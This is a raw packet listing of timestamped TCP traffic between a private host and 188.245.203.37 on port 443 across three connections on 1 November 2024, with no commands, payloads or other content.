Nov 1, 2024 20:58:34.052792072 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.052792072 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.052819967 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.052906036 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.052970886 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.055429935 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.055495977 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.055661917 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.055661917 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.055723906 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.055749893 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.055749893 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.055983067 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.058917046 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.058990002 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.059139967 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.059140921 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.059202909 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.059202909 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.059202909 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.059236050 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.059464931 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.061846972 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.061913013 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.062074900 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.062124014 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.062154055 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.062297106 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.064698935 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.064764023 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.064985037 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.064985037 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.064985991 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.065042019 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.065327883 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.067357063 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.067423105 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.067572117 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.067572117 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.067620993 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.067621946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.067621946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.067621946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.067656994 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.067837954 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.069951057 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.070019960 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.070213079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.070213079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.070270061 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.070291996 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.070291996 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.070425034 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.073319912 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.073386908 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.073581934 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.073581934 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.073581934 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.073656082 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.073843956 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.076013088 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.076081038 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.076203108 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.076203108 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.076260090 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.076260090 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.076303005 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.076323032 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.076410055 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.076483011 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.078641891 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.078707933 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.078855991 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.078943968 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.078944921 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.078995943 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.079237938 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.081195116 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.081260920 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.081417084 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.081417084 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.081482887 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.081482887 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.081482887 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.081513882 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.081712008 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.084898949 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.084966898 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.085119963 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.085120916 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.085120916 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.085186005 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.085221052 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.085221052 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.085422039 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.087671041 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.087738991 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.087904930 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.087904930 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.088021040 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.088021994 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.088021994 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.088064909 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.088251114 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.090058088 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.090116024 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.090265036 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.090354919 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.090382099 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.090594053 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.093631029 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.093687057 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.093858957 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.093858957 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.093859911 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.093859911 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.093859911 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.093938112 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.093986988 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.094086885 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.278960943 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.278975010 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.279017925 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.279140949 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279140949 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279160976 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279167891 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.279272079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279272079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279272079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279272079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279288054 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279288054 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279288054 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279288054 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279361963 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279361963 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279361963 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279383898 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.279481888 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.282851934 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.282864094 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.282905102 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.282969952 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.282982111 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.282982111 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.282990932 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.283060074 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283113003 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283113003 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283113003 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283128023 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283128977 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283128977 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283211946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283211946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283211946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283211946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283211946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283211946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283404112 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283404112 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283404112 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283404112 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283416033 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.283448935 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283448935 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283448935 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283514977 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283514977 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283514977 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283514977 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283514977 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283524990 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.283524990 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.284151077 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.284151077 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.284151077 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.284151077 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.284245968 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297039986 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.297053099 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.297094107 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.297139883 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.297224045 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.297240019 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297251940 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.297337055 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297338009 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297350883 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.297358036 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.297369003 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297369003 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297401905 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.297441006 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297462940 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297462940 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297513008 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297513008 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297513008 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297513008 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297513008 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297560930 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297560930 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297610044 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297660112 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297660112 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297660112 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297668934 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.297709942 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297759056 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297759056 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297759056 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297759056 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297759056 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297806978 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297806978 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297806978 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297856092 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297856092 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297856092 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297856092 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297856092 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297856092 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297952890 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297952890 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.297959089 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.298002005 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298100948 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298100948 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298100948 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298150063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298150063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298150063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298150063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298150063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298150063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298150063 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298160076 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.298197985 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298247099 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298247099 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298295975 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298295975 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298345089 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298345089 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298393965 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298393965 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298398972 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.298443079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298443079 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298492908 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298492908 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298492908 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298492908 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298492908 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298492908 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298541069 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298541069 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298541069 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298640013 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298640013 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298640013 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298640013 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298738003 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298738003 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298743963 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.298788071 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298788071 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298789024 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298836946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298836946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298836946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298836946 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298886061 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298886061 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298886061 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298944950 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.298983097 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298983097 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.298983097 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299081087 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299081087 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299130917 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299130917 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299130917 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299130917 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299180031 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299180031 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299180031 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299227953 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299227953 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299228907 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299228907 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299326897 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299326897 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299326897 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299326897 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299423933 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299423933 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299423933 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299477100 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299477100 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299525976 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299525976 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299525976 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299525976 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299525976 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299525976 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299575090 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299575090 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299673080 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.299673080 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.301589012 CET	58990	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.301598072 CET	443	58990	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.827384949 CET	58991	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.827467918 CET	443	58991	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:34.827651024 CET	58991	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.827805042 CET	58991	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:34.827830076 CET	443	58991	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:35.204020977 CET	443	58991	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:35.204276085 CET	58991	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:35.204514027 CET	58991	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:35.204556942 CET	443	58991	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:35.205648899 CET	58991	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:35.205648899 CET	58991	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:35.205696106 CET	443	58991	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:35.205722094 CET	443	58991	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:35.942342043 CET	443	58991	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:35.942411900 CET	443	58991	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:35.942507029 CET	58991	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:35.942647934 CET	58991	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:35.943454981 CET	58991	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:35.943473101 CET	443	58991	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:36.070040941 CET	58992	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:36.070066929 CET	443	58992	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:36.070348024 CET	58992	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:36.070585966 CET	58992	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:36.070595026 CET	443	58992	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:36.442884922 CET	443	58992	188.245.203.37	192.168.11.20
